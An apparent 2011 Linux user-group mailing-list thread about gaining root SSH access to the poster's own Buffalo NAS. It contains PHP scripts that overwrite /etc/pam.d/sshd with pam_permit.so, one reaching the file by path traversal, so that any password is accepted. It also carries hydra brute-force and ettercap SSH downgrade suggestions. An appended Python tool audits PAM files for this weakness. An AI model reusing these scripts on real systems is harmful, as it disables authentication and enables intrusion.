Is it possible to extract the root password from the file system?

Mark Phillips mark at phillipsmarketing.biz
Tue Jul 19 11:37:06 MST 2011


On Mon, Jul 18, 2011 at 10:06 PM, Dan Dubovik <dandubo at gmail.com> wrote:

> Can you SSH as the hammerhead user?
>
No
mark at orca:~/Desktop/buffalo_nas$ ssh hammerhead at xxx.xxx.xxx.xxx
Password:
Connection to xxx.xxx.xxx.xxx closed by remote host.
Connection to xxx.xxx.xxx.xxx closed.

>
> When you FTP as the hammerhead user, can you move the script.php file to
> the htdocs directory?  It has 777 permissions, so should be able to open it
> / drop a file there.
>
Yes, I can, and it does execute.

>
> If you can get a PHP file uploaded and able to execute properly, perhaps a
> PHP based shell could help?

I am not a php guy.....I don't know how to do this.

I tried a script to allow ssh without password for anyone. It seems to have
written the file, however, I still cannot ssh in as root. Note: this is my
first php script; the print statements helped me debug and see if it was
working.

<?php
echo "starting...<br>";
$filename = '/etc/pam.d/sshd';
// Read the current contents before opening the file for writing: fopen()
// with 'w+' truncates the file to zero length first, which is why the
// fread() right after fopen() always came back blank.
$contents = file_get_contents($filename);
echo "..file contents:<br> $contents<br>";

$fh = fopen($filename, 'w+') or die("can't open file");

// fwrite() returns the number of bytes written, or false on error; compare
// with === so a zero-byte write is not mistaken for a failure.
$stringData = "account  required   pam_unix.so\n";
$fw = fwrite($fh, $stringData);
if ($fw === false)
    echo "...#1 no luck writing file<br>";
else
    echo "...wrote $fw bytes: '$stringData'<br>";

$stringData = "session  required   pam_unix.so\n";
$fw = fwrite($fh, $stringData);
if ($fw === false)
    echo "...#2 no luck writing file<br>";
else
    echo "...wrote $fw bytes: '$stringData'<br>";

$stringData = "auth required pam_permit.so\n";
$fw = fwrite($fh, $stringData);
if ($fw === false)
    echo "...#3 no luck writing file<br>";
else
    echo "...wrote $fw bytes: '$stringData'<br>";

// 'w+' is read/write, so rewinding and reading back shows what was written.
rewind($fh);
$contents = fread($fh, 1000);
echo "...final file contents:<br> $contents<br>";

fclose($fh);
echo "done!<br>";
?>

Output from the script:
starting...
..file contents:

...wrote 32 bytes: 'account required pam_unix.so '
...wrote 32 bytes: 'session required pam_unix.so '
...wrote 28 bytes: 'auth required pam_permit.so '
...final file contents:
account required pam_unix.so session required pam_unix.so auth required
pam_permit.so
done!

One strange behavior....when I re-run the script, I expected to see the
contents of the file displayed after 'starting...' above, but it always
comes back blank, and I still cannot login using ssh....

I did this:
1. restart the nas
2. run script
3. I get this output:
mark at orca:~/Desktop/buffalo_nas$ ssh root at xxx.xxx.xxx.xxx
Connection closed by xxx.xxx.xxx.xxx

4. reset nas again
5. I get this output:
mark at orca:~/Desktop/buffalo_nas$ ssh root at xxx.xxx.xxx.xxx
Password:
Password:
Password:

Then all I get when I try to ssh in is Connection closed.

Does anyone have any php scripts to hack this box and give me root access
via ssh?

Thanks!

Mark

>
> -- Dan.
>
> On Mon, Jul 18, 2011 at 9:20 PM, Lisa Kachold <lisakachold at obnosis.com> wrote:
>
>> I believe the script.php has to be moved to the webroot directory and given
>> permissions there I believe, but well if you can't get a login via ssh... --
>> how to do it?
>>
>>
>> On Sun, Jul 17, 2011 at 8:58 AM, Mark Phillips <mark at phillipsmarketing.biz> wrote:
>>
>>> On Sun, Jul 17, 2011 at 3:54 AM, Lisa Kachold <lisakachold at obnosis.com> wrote:
>>>
>>>> There are a lot of password files and dictionary lists on various sites.
>>>> Backtrack5 contains a good number.
>>>>
>>>> But I imagine that it's either not allowing root via ssh or you have the
>>>> wrong username.
>>>>
>>>
>>> It turns out the box is smarter than a fifth grader.....after a few hydra
>>> attacks, it started rejecting all the hydra attempts to ssh in via root.
>>> Once I stopped hydra (after running all night), it took a couple of hours
>>> before it would respond to ssh attempts from root. It now will ask for the
>>> root password, but I still have no idea what it is.
>>>
>>>>
>>>> Or it's a truly random string.
>>>>
>>> It could be....the password for the zip file to unzip the file system is
>>> YvSInIQopeipx66t_DCdfEvfP47qeVPhNhAuSYmA4. Someone retrieved it using a
>>> disassembler on the file system.
>>>
>>> I did some more reading, and one person was able to use php to allow ssh
>>> login. The box allows one to create a web space, and it comes with php
>>> installed. One can edit the php.ini file, and I can upload via ftp a php
>>> script. The script they suggested is:
>>> <?php
>>> // Relative path from the web space up to the root filesystem.
>>> $file = '../../../../etc/pam.d/sshd';
>>> // 'w' truncates the existing file, then the three lines below replace it.
>>> $fh=fopen($file, 'w') or die("can't open file");
>>> $stringData = "account  required   pam_unix.so\n";
>>> fwrite($fh, $stringData);
>>> $stringData = "session  required   pam_unix.so\n";
>>> fwrite($fh, $stringData);
>>> $stringData = "auth required pam_permit.so\n";
>>> fwrite($fh, $stringData);
>>> fclose($fh);
>>> ?>
>>>
>>> I uploaded the script, but I get a 404 File not Found when I access the
>>> page. I thought it might be a file permission error since the file is only
>>> rw. I tried chmod 777 at the ftp prompt, and got the error message File not
>>> Found, but ls shows it is there.
>>>
>>> ftp> ls
>>> 200 PORT command successful
>>> 150 Opening ASCII mode data connection for file list
>>> drwxrwxrwx   2 apache   apache          6 Jul 17 08:23 cgi-bin
>>> drwxrwxrwx   2 apache   apache         22 Jul 17 08:23 htdocs
>>> drwxrwxrwx   2 apache   apache         39 Jul 17 08:23 log
>>> -rw-rw-rw-   1 hammerhead hdusers       335 Jul 17 08:49 script.php
>>> 226 Transfer complete
>>> ftp> chmod 777 script.php
>>> 550 CHMOD 777 script.php: No such file or directory
>>> ftp>
>>>
>>> Is there anything I can change in the php.ini file to make this script
>>> execute? Or, am I missing something else?
>>>
>>> BTW, I cannot ftp as root, but I can ftp as a user I created, hammerhead.
>>>
>>> Thanks,
>>>
>>> Mark
>>>
>>>>
>>>> On Fri, Jul 15, 2011 at 10:33 PM, Mark Phillips <mark at phillipsmarketing.biz> wrote:
>>>>
>>>>>> Since this is a drive buffalo, I might try ettercap ssh downgrade
>>>>>> attack:
>>>>>>
>>>>>> http://openmaniak.com/ettercap_filter.php
>>>>>> http://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade
>>>>>>
>>>>> Not sure how a man in the middle attack will work, since I don't know
>>>>> the password to begin with...
>>>>>
>>>>>> Or Hydra:
>>>>>>
>>>>>> Hydra Instructions:
>>>>>>
>>>>>> http://www.youtube.com/watch?v=7CP-JB4QARo
>>>>>>
>>>>> Hydra is promising. I tried it with the common passwords list from
>>>>> openwall. No luck. Do you have any better password lists?
>>>>>
>>>>> Thanks,
>>>>>
>>>>> Mark
>>>>>
>>>>> ---------------------------------------------------
>>>>> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
>>>>> To subscribe, unsubscribe, or to change your mail settings:
>>>>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>>>>
>>>>
>>>> --
>>>> (602) 791-8002  Android
>>>> (623) 239-3392 Skype
>>>> (623) 688-3392 Google Voice
>>>> HomeSmartInternational.com <http://www.homesmartinternational.com>
>>>>
>>>
>>
>>
>
>
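A defensive counterpart, added here and not part of the thread: a small Python audit of a PAM service file that flags the auth stack the scripts above leave behind (pam_permit.so with no module that checks a credential). The VERIFIERS set is my assumption about which modules count as credential checks, and the sample file contents are constructed from the thread.

```python
import re

# Added example, not code from the thread. Heuristic audit of a PAM service
# file (such as /etc/pam.d/sshd): the thread rewrites that file so the auth
# stack is only "auth required pam_permit.so", which accepts any password.
# Long-form "[...]" controls and "include"/"substack" targets are not followed.
PAM_LINE = re.compile(
    r"^-?(?P<type>auth|account|password|session)\s+"
    r"(?P<control>\[[^\]]*\]|\S+)\s+(?P<module>\S+)")

# Assumed set of modules that actually verify a credential (or deliberately fail).
VERIFIERS = {"pam_unix.so", "pam_unix2.so", "pam_ldap.so", "pam_sss.so",
             "pam_krb5.so", "pam_deny.so"}

def parse_pam(text):
    """Return (type, control, module) tuples; comments and blank lines skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = PAM_LINE.match(line) if line else None
        if m:
            entries.append((m["type"], m["control"].lower(), m["module"]))
    return entries

def audit_auth_stack(text):
    """List findings for the auth stack; an empty list means nothing was flagged."""
    auth = [(c, m) for t, c, m in parse_pam(text) if t == "auth"]
    if not auth:
        return ["no auth lines: service falls back to /etc/pam.d/other"]
    findings = []
    have_verifier = False          # a verifier (or include) anywhere in the stack
    strict_verifier_seen = False   # a required/requisite verifier before this line
    for control, module in auth:
        if control in ("include", "substack") or module in VERIFIERS:
            have_verifier = True
            if control in ("required", "requisite", "include", "substack"):
                strict_verifier_seen = True
        elif module == "pam_permit.so" and control == "sufficient" \
                and not strict_verifier_seen:
            # A successful 'sufficient' module ends the stack with success
            # unless an earlier required/requisite module already failed.
            findings.append("auth sufficient pam_permit.so short-circuits the "
                            "stack before any credential is checked")
    if not have_verifier:
        findings.append("auth stack has no credential-checking module; "
                        "pam_permit.so alone accepts any password")
    return findings

# Constructed sample: the /etc/pam.d/sshd contents the thread's script writes.
OVERWRITTEN_SSHD = ("account  required   pam_unix.so\n"
                    "session  required   pam_unix.so\n"
                    "auth required pam_permit.so\n")

if __name__ == "__main__":
    for finding in audit_auth_stack(OVERWRITTEN_SSHD) or ["auth stack looks sane"]:
        print(finding)
```

Run it against a copy of each file under /etc/pam.d to spot a service whose auth stack can no longer fail; a file-integrity check on that directory catches the overwrite itself.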